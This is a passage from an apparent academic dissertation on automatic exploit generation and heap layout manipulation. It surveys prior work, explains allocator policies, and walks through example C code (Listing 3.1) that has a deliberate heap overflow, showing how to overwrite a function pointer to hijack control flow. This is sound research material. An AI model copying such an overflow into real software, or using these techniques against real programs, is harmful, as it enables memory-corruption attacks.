The field of exploit generation is young, with the first academic publications occurring just over a decade ago. In this section I present an overview of those publications that are either directly relevant to the research I have performed, or otherwise provide useful context to the reader on the current state of the art in exploit generation for memory corruption vulnerabilities.

2.2.1 AEG for Stack-Based Overflows

Early work on AEG focused on the exploitation of stack-based buffer overflows in userland programs, with varying restrictions on the protection mechanisms in place, and the level of automation provided. In 2009 I [32] proposed an approach to AEG for stack-based buffer overflows that takes a crashing input that corrupts a stored instruction pointer and uses concolic execution to convert it into an exploit. Subsequently, Avgerinos et al. [33] proposed a symbolic execution based system that both searches for stack-based buffer overflows and generates exploits for them. This system was a precursor to Mayhem [34] by Cha et al., which itself would go on to be the basis for the system that won the DARPA Cyber Grand Challenge [35] (CGC). A number of other participants in that same contest developed systems [36–39] which combine symbolic execution and high performance fuzzing to identify, exploit and patch software vulnerabilities in an autonomous fashion. None of the CGC participants appear to specifically address the challenges of heap-based vulnerabilities.

2.2.2 AEG for Heap-based Overflows

Repel et al. [40] demonstrated the first approach to AEG for heap overflows. They connect a driver program to a target allocator and then, using concolic execution, search for exploitation primitives resulting from corruption of the allocator’s metadata. To generate an exploit for a real program, they require an input be provided that results in a corruption of metadata in a manner that was seen when analysing the driver program. Wang et al. [41] describe Revery, a system that uses a mix of fuzzing and symbolic execution to build exploits. A crashing input is turned into an exploit in two steps. First, using fuzzing they search for a path that is similar to the crashing path but may instead provide an IP hijack primitive. They then try to stitch the original path to the path containing the primitive using symbolic execution. Their approach can generate exploits for heap overflows, but only in the case where their fuzzer happens by chance to produce the required heap layout. Revery is evaluated on capture-the-flag challenge binaries which, while diverse, are small programs. Eckert et al. [42] describe HeapHopper, a system for discovering primitives in heap allocators. Their work differs from mine in that I focus on exploiting the corruption of data used by the application itself, while they focus on attacking allocator metadata. Furthermore, as their goal is to find weaknesses in the allocator they do not consider exploit generation in the context of real programs embedding the allocator. Instead, the allocator is connected to a driver program and exploits are built in that context.

2.2.3 Assisting Exploit Development and Payload Generation

Wu et al. [43] describe FUZE, a system that takes triggers for use-after-frees in the Linux kernel and generates information to assist in producing an exploit. Their approach relies on a hybrid of symbolic execution, fuzzing and instrumentation. Continuing their work on the Linux kernel, Wu et al. [44] introduce KEPLER, which assists with exploit generation by taking as input a control-flow hijack primitive and generating a payload using it that can be used to bootstrap any other ROP-based payload. In the most recent instalment in this chain of work, Chen et al. [45] describe SLAKE, a system that assists with exploitation of the Linux kernel by using static and dynamic methods to search for objects that are useful for exploit generation, a means to allocate those objects, and a means to manipulate the heap layout to facilitate exploitation. Garmany et al. [46] address the issue of converting vulnerability triggers for heap-related issues in web browsers into exploitation primitives. Their system, PrimGen, performs a static analysis to determine if there is a path from a crash to a potentially useful primitive, then uses symbolic execution to try to modify existing heap allocated objects to reach the primitive. In this work I do not touch on the problem of generating complex payloads. As will be discussed in Chapter 5, I rely on the existence of single-gadget payloads when using control-flow hijack primitives, or avoid the use of such payloads at all with the use of memory write primitives. However, payload generation, and the integration of such payloads with an exploit, presents an interesting set of problems. Schwartz et al. [47] introduce Q, a system for constructing return-oriented programming (ROP) payloads. They use a combination of symbolic execution and dynamic analysis to construct payloads from fragments of executable code, called gadgets. Bao et al.
[48] describe Shellswap, a system for automatically replacing the payload of an exploit with an alternative. Ispoglou et al. [49] describe BOPC, a compiler for building payloads that defeat control-flow integrity (CFI) protection mechanisms, under the assumption that a repeatable primitive is available that allows the attacker to write arbitrary data to arbitrary addresses.

2.2.4 Data-Only Attacks

Data-only exploits [50] are exploits that instead of corrupting control variables, such as function pointers, corrupt data variables. Hu et al. [51] describe a technique for automatically stitching together dataflows in order to leak or tamper with

sensitive data. Their tool, FlowStitch, automatically constructs an exploit from a provided vulnerability trigger, under the assumption that the vulnerability trigger provides a primitive that is directly usable to modify whatever data variables are required. Later [52], they show that multiple data-oriented gadgets can be chained together to build Turing-complete attacks and that the required gadgets to build such payloads can be automatically found.

2.2.5 Theory of Exploitation

Dullien [53] formalises the concept of an exploit as the process of setting up and programming a weird machine. In the context of this formalisation, heap layout manipulation can be viewed as part of the process for producing the correct sane state from which to transition to a weird state. The notion of a “weird machine” is due to Sergey Bratus and the LangSec community, and the term has been in use in an informal context for a number of years [54]. Vanegue [55] defines a calculus for a simple heap allocator and also provides a formal definition [56] of the related problem of automatically producing inputs which maximise the likelihood of reaching a particular program state given a non-deterministic heap allocator.

2.2.6 Manual Exploit Development

The processes that I automate are directly inspired by the techniques described in the publications of the hacking and security communities. There are extensive publications on reverse engineering heap implementations [57, 58], leveraging weaknesses in those implementations for exploitation [59–62], and heap layout manipulation for exploitation [63, 64]. There is also work on constructing libraries for debugging heap internals [65] and libraries which wrap an application’s API to provide layout manipulation primitives [66]. Manually constructed solutions for heap layout manipulation in non-deterministic settings are also commonplace in the literature of the hacking and security communities [67, 68]. The exploitation strategies that I leverage, of using corruption to modify function and data pointers, are commonplace and well documented in both articles [65, 69, 70] and exploits [71].

Right or wrong, it’s very pleasant to break something from time to time.
— Fyodor Dostoyevsky, Notes from the Underground

3 A Greybox Approach to the Heap Layout Problem

3.1 Introduction

Early work on AEG [32–34, 72] focused predominantly on the exploitation of stack-based buffer overflows. This prior work describes algorithms for automatically producing a control-flow hijacking exploit, under the assumption that an input is provided, or discovered, that results in the corruption of an instruction pointer stored on the stack. However, stack-based buffer overflows are just one type of vulnerability found in software written in C and C++. Out-of-bounds (OOB) memory access from heap buffers is a common flaw and, until recently, has received little attention in terms of automation. Heap-based memory corruption differs significantly from stack-based memory corruption. In the latter case the data that the attacker may corrupt is limited to whatever is on the stack and can be varied by changing the execution path used to trigger the vulnerability. For heap-based corruption, it is the physical layout of dynamically allocated buffers in memory that determines what gets corrupted, and the attacker must reason about the heap layout to automatically construct an exploit. In recent years, Repel et al. [40] and Wang et al. [41] have described systems that are capable of generating exploits for heap-based vulnerabilities under assumptions regarding the heap layout. In the former case, it is assumed that an external system provides a vulnerability trigger that already achieves the heap layout required for exploitation, while in the latter case it is assumed that the system will happen upon an exploitable heap layout, by chance,

during the course of its analysis. In this chapter I describe the heap layout problem, why it is important, and a solution for one variant of it, based on random search. To leverage OOB memory access as part of an exploit, an attacker will usually want to position some dynamically allocated buffer D, the OOB access destination, relative to some other dynamically allocated buffer S, the OOB access source.1 The desired positioning will depend on whether the flaw to be leveraged is an overflow or an underflow, and on the control the attacker has over the offset from S that will be accessed. Normally, the attacker wants to position S and D so that, when the vulnerability is triggered, D is corrupted while minimising collateral damage to other heap allocated structures. Allocators do not expose an API to allow a user to control relative positioning of allocated memory regions. In fact, the ANSI C specification [18] explicitly states

The order and contiguity of storage allocated by successive calls to the calloc, malloc, and realloc functions is unspecified.

Furthermore, applications that use dynamic memory allocation do not expose an API allowing an attacker to directly interact with the allocator in an arbitrary manner. An exploit developer must first discover the allocator interactions that can be indirectly triggered via the application’s API, and then leverage these to solve the layout problem. In practice, both problems are usually solved manually; this requires expert knowledge of the internals of both the heap allocator and the application’s use of it. In this chapter I introduce the heap layout problem and provide an algorithm for solving it based on random search. I also introduce the various practical problems that must be solved in order to automate heap layout manipulation in real programs, and describe solutions for these.

3.1.1 An Example

Consider the code in Listing 3.1 showing the API for a target program. The rename function contains a heap-based overflow if the new name is longer than the old name. One way for an attacker to exploit the flaw in the rename function is to try to position a buffer allocated to hold the name for a User immediately before a User structure. The User structure contains a function pointer as its first field and an attacker in control of this field can redirect the control flow of the target to a destination of their choice by then calling the display function.

1Henceforth, when I refer to the ‘source’ and ‘destination’ I mean the source or destination buffer of the overflow or underflow.

 1 typedef struct {
 2   DisplayFn display;
 3   char *n;
 4   unsigned *id;
 5 } User;
 6
 7 User* create(char *name) {
 8   if (!strlen(name) || strlen(name) >= 8)
 9     return 0;
10   User *user = malloc(sizeof(User));
11   user->display = &printf;
12   user->n = malloc(strlen(name) + 1);
13   strlcpy(user->n, name, 8);
14   user->id = malloc(sizeof(unsigned));
15   get_uuid(user->id);
16   return user;
17 }
18
19 void destroy(User *user) {
20   free(user->id);
21   free(user->n);
22   free(user);
23 }
24
25 void rename(User *user, char *new) {
26   strlcpy(user->n, new, 12);
27 }
28
29 void display(User *user) {
30   user->display(user->n);
31 }

Listing 3.1: Example API offered by a target program.

As the attacker cannot directly interact with the allocator, the desired heap layout must be achieved indirectly utilising those functions in the target’s API which perform allocations and deallocations. While the create and destroy functions do allow the attacker to make allocations and deallocations of a controllable size, other allocator interactions that are unavoidable also take place, namely the allocation and deallocation of the buffers for the User and id. We refer to these unwanted interactions as noise, and such interactions, especially allocations, can increase the difficulty of the problem by placing buffers between the source and destination.

Figure 3.1: A series of interactions which result in a name buffer immediately prior to a User structure.

2Assume a best-fit allocator using last-in-first-out free lists to store free chunks, no limit on free chunk size, no size rounding and no inline allocator metadata. Furthermore, assume that pointers are 4 bytes in size and that a User structure is 12 bytes in size.

Figure 3.1 shows one possible sequence in which the create and destroy functions are used to craft the desired heap layout.2 The series of interactions performed by the attacker are as follows:

1. Four users are created with names of length 7, 3, 1, and 3 letters, respectively.

2. The first and the third user are destroyed, creating two holes: one of size 24 and one of size 18.

3. A user with a name of length 7 is created. The allocator uses the hole of size 18 to satisfy the allocation request for the 12-byte User structure, leaving 6 free bytes. The request for the 8-byte name buffer is satisfied using the 24-byte hole, leaving a hole of 16 bytes. An allocation of 4 bytes for the id then reduces the 6 byte hole to 2.

4. A user with a name of length 3 is created. The 16-byte hole is used for the User object, leaving 4 bytes into which the name buffer is then placed. This results in the name buffer, highlighted in green, being directly adjacent to a User structure.
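The four steps above can be replayed with a toy model of the assumed allocator: best fit, blocks split from the front, immediate coalescing, no size rounding, no inline metadata, a 12-byte User and 4-byte pointers. This is an illustrative sketch only; all names are invented, and addresses are plain integers rather than real pointers:

```c
/* Free holes are (address, size) pairs; 'wilderness' is the next fresh
 * address at the end of the simulated heap. */
typedef struct { int addr, size; } Hole;
static Hole holes[64];
static int nholes;
static int wilderness;

static int sim_malloc(int size) {
    int best = -1;
    for (int i = 0; i < nholes; i++)       /* best fit over all holes */
        if (holes[i].size >= size &&
            (best == -1 || holes[i].size < holes[best].size))
            best = i;
    if (best == -1) { int a = wilderness; wilderness += size; return a; }
    int a = holes[best].addr;               /* split from the front */
    holes[best].addr += size;
    holes[best].size -= size;
    if (holes[best].size == 0) holes[best] = holes[--nholes];
    return a;
}

static void sim_free(int addr, int size) {  /* immediate coalescing */
    for (int i = 0; i < nholes; ) {
        if (holes[i].addr + holes[i].size == addr) {
            addr = holes[i].addr; size += holes[i].size;
            holes[i] = holes[--nholes]; i = 0;
        } else if (addr + size == holes[i].addr) {
            size += holes[i].size;
            holes[i] = holes[--nholes]; i = 0;
        } else { i++; }
    }
    holes[nholes].addr = addr; holes[nholes++].size = size;
}

typedef struct { int user, name, id, namelen; } SimUser;

static SimUser sim_create(int namelen) {    /* mirrors create() */
    SimUser u = { sim_malloc(12), 0, 0, namelen };
    u.name = sim_malloc(namelen + 1);
    u.id = sim_malloc(4);
    return u;
}

static void sim_destroy(SimUser u) {        /* mirrors destroy() */
    sim_free(u.id, 4);
    sim_free(u.name, u.namelen + 1);
    sim_free(u.user, 12);
}

/* Replays steps 1-4; returns 1 if the final name buffer ends exactly
 * where the second user's User structure begins. */
int replay_example(void) {
    nholes = 0; wilderness = 0;
    SimUser u1 = sim_create(7), u2 = sim_create(3);
    SimUser u3 = sim_create(1);
    sim_create(3);                          /* fourth user */
    sim_destroy(u1);                        /* step 2: hole of size 24 */
    sim_destroy(u3);                        /* step 2: hole of size 18 */
    sim_create(7);                          /* step 3 */
    SimUser u6 = sim_create(3);             /* step 4 */
    return u6.name + 4 == u2.user;
}
```

Running the replay, the 4-byte name buffer from the final create ends exactly at the address of the second user’s User structure, matching the adjacent layout described in step 4.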

Once this layout has been achieved an overflow can be triggered using the rename function, corrupting the display field of the User object. The control flow of the application can then be hijacked by calling the display function with the corrupted User object as an argument.
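The corruption step can be illustrated safely with a byte array standing in for the heap. The offsets follow the assumptions used in this example: an 8-byte name buffer directly before a User whose first field is the 4-byte display pointer. The function name and layout here are illustrative:

```c
#include <string.h>

/* Returns 1 if overflowing the name buffer overwrote the adjacent
 * User's display field. A byte array stands in for the heap so the
 * out-of-bounds write stays within a valid object. */
int overflow_demo(void) {
    unsigned char heap[24] = {0};
    unsigned char *name = heap;       /* 8-byte name buffer */
    unsigned char *user = heap + 8;   /* User; display is its first field */

    /* rename(user, "AAAAAAAABBB"): strlcpy copies up to 11 characters
     * plus a NUL into the 8-byte buffer; the 'B's land on display. */
    memcpy(name, "AAAAAAAABBB", 12);

    return user[0] == 'B' && user[1] == 'B' && user[2] == 'B';
}
```

In a real exploit the attacker would of course replace the ‘B’ bytes with the address of code they wish to execute, and then call display.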

3.2 Heap Allocator Mechanisms

Heap allocators are libraries responsible for servicing dynamic requests for memory allocation and typically expose an interface that complies with the ANSI C [18] specification for the functions malloc, free, realloc and calloc. Allocators are online algorithms, meaning they must respond to sequences of interactions that are not known upfront and cannot be predicted. Thus, an allocator must be designed to take advantage of regularities in expected frequently occurring interaction sequences, while being resilient against pathological edge cases. As mentioned in Section 3.1, the ANSI C specification imposes no restrictions on ‘the order and contiguity of storage allocated by successive calls’ to these functions. Thus, the developers of an allocator can effectively choose any combination of data structures and algorithms in their implementation to achieve the best results across whatever measure of success they choose, be it minimising fragmentation, maximising speed, increasing security, or some other metric entirely. As discussed by Wilson [73], the approach that a heap allocator takes to memory management can be analysed at three different levels of granularity: the general strategy for buffer management which the developers wish to encode; an implementable, but high level, algorithm in the form of a policy which describes how to manage buffers in compliance with the strategy; and the low level mechanisms used to actually encode the policy, in the form of the data structures and algorithms that make up the code of the allocator. For example, a strategy aimed at maximising locality of reference might be ‘place buffers as close as possible to the last allocated buffer’, which makes the assumption that buffers allocated together are likely to be accessed together. The next fit policy is one possible concrete embodiment of this strategy, which starts searching for a free buffer to return at the next address after the last returned buffer.
Finally, one could use a linked list ordered by address to store free chunks as the underlying data structure, combined with a linear scan starting from the next highest free buffer after the last returned buffer, as the mechanism which implements the policy. The freedom of choice that developers have in designing allocators means that there are diverse combinations of both high level strategies and low level implementation mechanisms. Even within a single allocator there may be implementations of different approaches, to be used under different circumstances. However, not all differences in the design choices of an allocator are relevant when it comes to heap layout manipulation. In Section 3.2.1 I elaborate on the differing aspects of heap allocators that are relevant when it comes to manipulating a heap layout for exploitation. The existing literature can be consulted for a thorough taxonomy of allocators [73], in-depth analysis of individual implementations [61–63, 74, 75], and material on trade-offs in allocator design [76, 77].

Figure 3.2: Differing heap layouts can be produced from the same allocation sequence if the allocator splits blocks from the start versus from the end.

3.2.1 Relevant Allocator Policies and Mechanisms

Splitting

Allocators may or may not split blocks of memory to fulfil a request for a smaller block. When blocks are split, the area to use for the allocation may be split from either the beginning or the end of the existing block. For example, both dlmalloc and avrlibc will split blocks, but the former splits from the front, while the latter splits from the end. If splitting takes place from the front then there is space to place another block after the returned block, while if splitting takes place from the end then there is space to place another block before the returned block. In contrast with both of these, tcmalloc only splits blocks above 32KB in size. Figure 3.2 shows two possible state transitions for the heap state, depending on what form of splitting is used. The initial block of memory has size 128 and two allocations are made, the first of size 32 and the second of size 16. In the first outcome, labelled ‘A’, the block of size 32 ends up before the block of size 16, while in the second outcome, labelled ‘B’, the order is reversed. This is significant if one requires a particular ordering for the blocks resulting from two allocations.
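The two splitting policies can be sketched as follows; applying them to the example above (a 128-byte block, then allocations of 32 and 16 bytes) reproduces the two orderings from Figure 3.2. The function names are illustrative:

```c
/* A free hole is an (address, size) pair. Both functions carve req
 * bytes out of the hole but return opposite ends of it. */
typedef struct { int addr, size; } Hole;

/* Split from the front: the remainder sits after the returned block
 * (dlmalloc-style). */
int split_front(Hole *h, int req) {
    int a = h->addr;
    h->addr += req;
    h->size -= req;
    return a;
}

/* Split from the end: the remainder sits before the returned block
 * (avrlibc-style). */
int split_end(Hole *h, int req) {
    h->size -= req;
    return h->addr + h->size;
}
```

Starting from a hole at address 0 of size 128, splitting from the front places the 32-byte block at 0 and the 16-byte block at 32 (outcome ‘A’), while splitting from the end places them at 96 and 80 respectively, reversing their order (outcome ‘B’).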

Coalescing

When blocks are freed, and have other free blocks which are immediately adjacent, they may be coalesced into a single, larger, free block. Allocators may or may not do this, or they may utilise an intermediate approach where coalescing is delayed, but will eventually happen if some event occurs, such as the number of uncoalesced blocks exceeding a threshold. If immediate coalescing is used, such as in modern dlmalloc and avrlibc, then it is not possible to have two free blocks next to each other. Should this occur, they will be immediately coalesced into a larger free block. However, if delayed coalescing is used, such as in early versions of dlmalloc

Figure 3.3: Depending on what type of coalescing is in use it may or may not be possible to have two free blocks adjacent to each other.

and some versions of the Windows userland [60] and kernel heaps [59], then it is possible to have multiple free chunks adjacent to each other. Figure 3.3 shows two possible state transitions for the heap state, depending on what form of coalescing is used. The outcome labelled ‘A’ results from an allocator with immediate coalescing, where a hole of size 256 is produced from two frees of size 128. The outcome labelled ‘B’ results from an allocator with delayed coalescing, where two holes of size 128 are produced from two frees of size 128. If the aim is to create holes of size 128 then triggering the second free is either useful or counterproductive, depending on whether or not delayed coalescing is in use.
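The difference between the two policies can be sketched as follows. This is a toy model of free-list behaviour, not any real allocator's implementation; blocks are (start, size) pairs and the delayed policy simply never merges.

```python
# Sketch: immediate vs delayed coalescing of adjacent free blocks.

def free_blocks(freed, policy):
    free_list = []
    for block in freed:
        if policy == "immediate":
            # Merge with any adjacent free block straight away.
            for other in list(free_list):
                if other[0] + other[1] == block[0]:    # other ends where block starts
                    free_list.remove(other)
                    block = (other[0], other[1] + block[1])
                elif block[0] + block[1] == other[0]:  # block ends where other starts
                    free_list.remove(other)
                    block = (block[0], block[1] + other[1])
        free_list.append(block)
    return free_list

# Two adjacent frees of size 128:
assert free_blocks([(0, 128), (128, 128)], "immediate") == [(0, 256)]  # one hole of 256
assert free_blocks([(0, 128), (128, 128)], "delayed") == [(0, 128), (128, 128)]  # two holes
```

This mirrors outcomes ‘A’ and ‘B’ of Figure 3.3: the same pair of frees produces either a single hole of size 256 or two holes of size 128.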

Fits

When scanning for a suitably sized free block to utilise for an allocation there are several options for where to start the search and the condition on which to end it. The most common approach is best fit, in which the free block with size closest to that of the requested allocation is guaranteed to be found, split if necessary, and returned. Alternatives include first fit and next fit. In first fit, the first block encountered during the search that is large enough to fulfil the requested allocation is selected, split if necessary, and returned. Next fit is a variant of first fit in which each search resumes from the point in the free list where the previous search ended. The fit policy in use is relevant to heap layout manipulation in that it influences which block is selected for a particular size.
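Best fit and first fit can be contrasted with a small sketch. This is illustrative only; real allocators index their free lists rather than scanning a Python list.

```python
# Sketch of best-fit vs first-fit selection from a free list of
# (start, size) holes held in address order.

def best_fit(free_list, size):
    candidates = [b for b in free_list if b[1] >= size]
    return min(candidates, key=lambda b: b[1], default=None)

def first_fit(free_list, size):
    return next((b for b in free_list if b[1] >= size), None)

# Free list: holes of size 64, 32 and 48, in address order.
holes = [(0, 64), (100, 32), (200, 48)]

assert best_fit(holes, 40) == (200, 48)  # closest size that still fits
assert first_fit(holes, 40) == (0, 64)   # first hole large enough
```

For the same request the two policies select different holes, and therefore produce different layouts from identical interaction sequences.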

Segregated Free Lists

Some allocators, such as avrlibc, utilise a single free list in which all free chunks are stored. While simple to implement, this approach has a significant downside in that if one wishes to utilise a best fit search then the entire list may need to be scanned in order to determine which block to use for an allocation. An alternative approach, as found in modern dlmalloc, is segregated free lists, in which multiple free lists are used and blocks of the same, or similar, size are kept in the same list. With segregated free lists one can efficiently check to see if a free block of a particular size exists. For the purposes of heap layout manipulation, a single free list or multiple free lists do not significantly impact the complexity of the problem, or the approach one takes.

Segregated Storage

Segregated storage is a mechanism whereby contiguous areas of memory are set aside for the allocation of blocks of a single size. For example, on the first request for a block of size 32 the allocator might obtain one or more pages from the operating system and subdivide those pages into blocks of size 32. The blocks will then not be further split or coalesced. These blocks could be inserted into a free list but, more commonly, a bitmap is associated with this run of pages which indicates which indices are free and which are allocated. Finding a free block then no longer requires traversing a list. Instead the address of a block can be calculated via simple arithmetic over the base address of the run and the index of the block the developer wants the address of. Along with potential speed increases, this removes the need for the in-band meta-data often used to maintain free lists, resulting in improved memory efficiency and potentially improving the security of the allocator, as in-band meta-data is a popular target in memory corruption exploits. Whether segregated storage is in use or not has a significant impact on how one approaches heap layout manipulation. The impact this single design decision can have on heap layout is highlighted in the contrast between Figures 3.4 and 3.5. Both figures show the heap state after an identical series of approximately 100 allocator interactions consisting of allocations of three different sizes and a number of frees. Figure 3.4 shows dlmalloc, which does not use segregated storage, and thus we can see that allocations of different sizes end up alternating in memory. Figure 3.5 shows tcmalloc, an allocator which does use segregated storage, resulting in three distinct memory regions, each of which contains allocations of a single size. As can be seen, the layout resulting from the same series of allocations is drastically different between the two allocators.
In Figure 3.4 the allocations are grouped together, with most successive allocations simply being placed at the next highest free address. In contrast, tcmalloc results in these allocations being spread out over a much larger area of memory (resulting in the ‘zoomed out’ viewpoint).
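The index arithmetic and bitmap bookkeeping described above can be sketched as follows. This is a toy model of a single run, not any real allocator; the base address and sizes are invented for illustration.

```python
# Sketch: with segregated storage, the address of a block in a run is pure
# arithmetic over the run's base address and the block index; a bitmap
# tracks which indices are free.

class Run:
    def __init__(self, base, block_size, count):
        self.base, self.block_size = base, block_size
        self.bitmap = [False] * count  # False = free

    def alloc(self):
        idx = self.bitmap.index(False)  # find a free index (raises if run is full)
        self.bitmap[idx] = True
        return self.base + idx * self.block_size

    def free(self, addr):
        self.bitmap[(addr - self.base) // self.block_size] = False

run = Run(base=0x1000, block_size=32, count=128)
a = run.alloc()
b = run.alloc()
assert a == 0x1000 and b == 0x1020  # adjacent blocks of the same size class
run.free(a)
assert run.alloc() == a             # the freed index is reused
```

Within a run, only blocks of a single size class can ever be adjacent, which is why segregated storage so strongly constrains achievable layouts.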

Figure 3.4: Heap state evolution for dlmalloc. The x axis represents time, or more accurately ‘ticks’ caused by new allocator interactions, while the y axis represents memory addresses from lowest to highest. Green rectangles represent memory regions that are currently allocated. Grey rectangles represent memory regions that were allocated previously but are now free. The height of a rectangle indicates how large the memory region is, while its width represents how long it was allocated for. A light green background represents an area of memory being mapped, while a white background, as can be seen in Figure 3.5, represents an area of unmapped memory.

Figure 3.5: Heap state evolution for tcmalloc. The axes are as in Figure 3.4.

Non-Determinism

While most allocators are internally deterministic in their operations, some utilise non-determinism in allocation as part of an effort to make exploitation more difficult. This differs from traditional Address Space Layout Randomisation (ASLR), which randomises the base address of the heap to prevent an attacker knowing where it is located in memory. Non-determinism in the allocation process works alongside ASLR to add randomisation to the state transitions of the allocator itself. This is problematic for heap layout manipulation as it means that over multiple runs of a program from the same starting state, the same sequence of interactions may produce a different layout each time. Non-determinism of this fashion can be found in at least two mainstream allocators, namely the Windows 10 Low Fragmentation Heap (LFH) [58] and jemalloc. In this dissertation I do not address the problem of non-deterministic allocator behaviour.

Treatment of Larger Allocations

Most allocators utilise different algorithms and data structures to handle allocations of sizes that they consider to be small versus those they consider to be large. For example, an allocator might use segregated free lists for allocations up to a certain size and simply use mmap and munmap to manage allocations above that size. The threshold above which an allocator considers an allocation to be large varies by allocator, and also sometimes by the operating system and architecture on which that allocator is running. Depending on the algorithms used, the desired layout and the starting heap state, this can either make heap layout manipulation easier or more difficult.
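A minimal sketch of this size-based routing follows. The 256KB threshold is illustrative only; as noted, real thresholds vary by allocator, operating system and architecture.

```python
# Sketch: requests below a (hypothetical) threshold go to the small-object
# machinery; requests above it go straight to mmap/munmap.

LARGE_THRESHOLD = 256 * 1024  # illustrative; varies by allocator

def route(size):
    return "mmap" if size > LARGE_THRESHOLD else "free-lists"

assert route(64) == "free-lists"
assert route(1024 * 1024) == "mmap"
```

A consequence for layout manipulation is that allocations on opposite sides of the threshold are managed by entirely separate mechanisms, and so cannot be interleaved in the same way as two small allocations.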

3.2.2 Allocators

For experimentation and evaluation I selected a number of real world allocators, implementing a variety of different strategies and policies. I will refer to dlmalloc and avrlibc as free list based and tcmalloc and PHP as segregated storage based. An overview of the allocators selected can be found in Table 3.1, and their relevant nuances are as follows:

• avrlibc 2.0 An allocator aimed at embedded systems [78] which utilises best fit search over a single free list. The maximum heap size and its location are fixed at compile time. If an existing free chunk of sufficient size does not exist then a new chunk is carved from the remaining heap space.

Table 3.1: Allocator Features. Entries marked with an asterisk indicate that the behaviour may or may not occur, depending on the size of chunk of memory allocated or freed. See section 3.2.2 for details.

Allocator   Version   Splits Blocks   Carves From   Coalesces Blocks   Segregated Storage   Deterministic
avrlibc     2.0       Yes             Tail          Yes                No                   Yes
dlmalloc    2.8.6     Yes             Head          Yes                No                   Yes
tcmalloc    2.6.1     *               Head          *                  Yes                  Yes
PHP         7         *               Head          *                  Yes                  Yes

• dlmalloc 2.8.6 A general purpose allocator [76] utilising best fit search over segregated free lists to store blocks with size less than 256KB. Free blocks less than 256 bytes in size are organised in linked lists, while those above 256 bytes, but less than 256KB, are kept in tries. Allocation requests for sizes greater than 256KB use mmap. The glibc allocator, ptmalloc, is based on dlmalloc.

• tcmalloc 2.6.1 Intended as a more efficient replacement for dlmalloc and its derivatives, especially in multi-threaded environments [79]. Sizes above 32KB are allocated using best-fit search from a linked list of free pages, and splitting and coalescing may take place. Segregated storage is used for sizes below 32KB.

• PHP 7 The allocator for version 7 of the PHP language interpreter. Sizes above 2MB are allocated via mmap. Sizes below 2MB but above three quarters of the page size are rounded to the nearest multiple of the page size and are allocated on page boundaries using best-fit search over a linked list of free pages. Sizes that are less than three quarters of a page are rounded up to the next largest predefined small size, of which there are 30 (e.g. 8, 16, 24, 32, ..., 3072), and are allocated from runs using segregated storage.

3.3 The Heap Layout Manipulation Problem in Deterministic Settings

Figure 3.6: The challenges in achieving a particular layout vary depending on whether the allocator behaves deterministically or non-deterministically and whether or not the starting state of the heap is known.

As of 2019, the most common approach to solving heap layout manipulation problems is manual work by experts. An exploit developer examines the allocator’s implementation to gain an understanding of its internals, analyses the source code of the target application to figure out how to interact with the allocator, then, at run-time, inspects the state of the allocator’s various data structures to determine what interactions are necessary in order to manipulate the heap into the required layout. Heap layout manipulation primarily consists of two activities: creating and filling holes in memory. A hole is a free area of memory that the allocator may use to service future allocation requests. Holes are filled to force the positioning of an allocation of a particular size elsewhere, or the creation of a fresh area of memory under the management of the allocator. Holes are created to capture allocations that would otherwise interfere with the layout one is trying to achieve. This process is documented in the literature of the hacking and computer security communities, with a variety of papers on the internals of individual allocators [62, 63, 74, 75], as well as the manipulation and exploitation of those allocators when embedded in applications [64, 65, 80]. The process is complicated by the fact that – when constructing an exploit – one cannot directly interact with the allocator, but instead must use the API exposed by the target program. Manipulating the heap state via the program’s API is often referred to as heap feng shui in the computer security literature [66]. Discovering the relationship between program-level API calls and allocator interactions is a prerequisite for real-world HLM but can be addressed separately, as I demonstrate in section 3.5.2.

3.3.1 Problem Restrictions for a Deterministic Setting

There are at least four variants of the HLM problem, as shown in Figure 3.6, depending on whether the allocator is deterministic or non-deterministic and whether the starting state is known or unknown. A deterministic allocator is one that does not utilise any random behaviour when servicing allocation requests. The majority

of allocators are deterministic, but some, such as the Windows system allocator, jemalloc and the DieHard family of allocators [81, 82], do utilise non-determinism to make exploitation more difficult. The starting state of the heap at the point where the attacker can begin interacting with the allocator is given by the allocations and frees that have taken place up to that point. For the starting state to be known, this sequence of interactions must be known. In this dissertation I consider a known starting state and a deterministic allocator, and assume there are no other actors interacting with the heap. This is a strong precondition, but it is a logical starting point for my research given there exists no prior work on the problem of heap layout manipulation. Furthermore, it corresponds to a set of real world exploitation scenarios and provides a building block for addressing the other three problem variants. Local privilege escalation exploits are a scenario in which these restrictions may be met, as the attacker may be able to tell what allocations and deallocations take place prior to their interactions. For remote and client-side targets, the starting state is usually not known. However, for some such targets it is possible to force the creation of a new heap in a predictable state, either by (ab)using some feature of the application, or using a vulnerability to force a restart of the application in a known state. When unknown starting states and non-determinism must be dealt with, approaches such as allocating a large number of objects on the heap in the hope of corrupting one when the vulnerability is triggered are often used. However, in the problem variant I address it is usually possible to position the overflow source relative to a specific target buffer. Thus our objective in this variant of the HLM problem is as follows:

Given the API for a target program and a means by which to allocate a source and destination buffer, find a sequence of API calls that positions the destination and source at a specific offset from each other.

3.3.2 Heap Layout Manipulation Primitives

Across most allocators there are fundamental operations which, once one discovers how to achieve them, can be used as the building blocks for heap layout manipulation. I refer to these as heap layout manipulation primitives, and two of the most general are the ability to fill holes in the heap and create holes in the heap.

Figure 3.7: Hole filling to ensure two allocations are placed next to each other in a best-fit allocator. The source allocation is marked as ‘S’, the destination allocation as ‘D’, and the filling allocations as ‘F1’ and ‘F2’.

Figure 3.8: Hole filling to trigger different splitting order.

Hole Filling

The ability to fill a hole of a particular size in memory allows one to force later allocations of that size or smaller to be placed elsewhere. If a hole exists in memory which is large enough to consume one, but not both, of the source and destination buffers then it may be necessary to fill that hole via a separate allocation. An example of this can be seen in Figure 3.7. Assume for this example that the source size is 32 and the destination size is 64. There are two holes of exactly size 32, which will consume the allocation of the source buffer if they are not filled, as can be seen in the outcome labelled ‘A’. If they are first filled, as in the outcome labelled ‘B’, then the source and destination end up next to each other. In some cases it may even be desirable to fill holes that could in fact fit both the source and destination allocations. For example, some allocators treat space which is at the top of the heap differently to internal holes in the heap. avrlibc carves allocations from the end of internal holes but from the beginning of the space at the end of the heap, which is used if no internal holes are available of a suitable size. In such cases, by filling the heap one can force the top of the heap

Figure 3.9: Heap layout resulting from the execution of an interaction sequence consisting of the allocation of the source, a noisy allocation, and the destination.

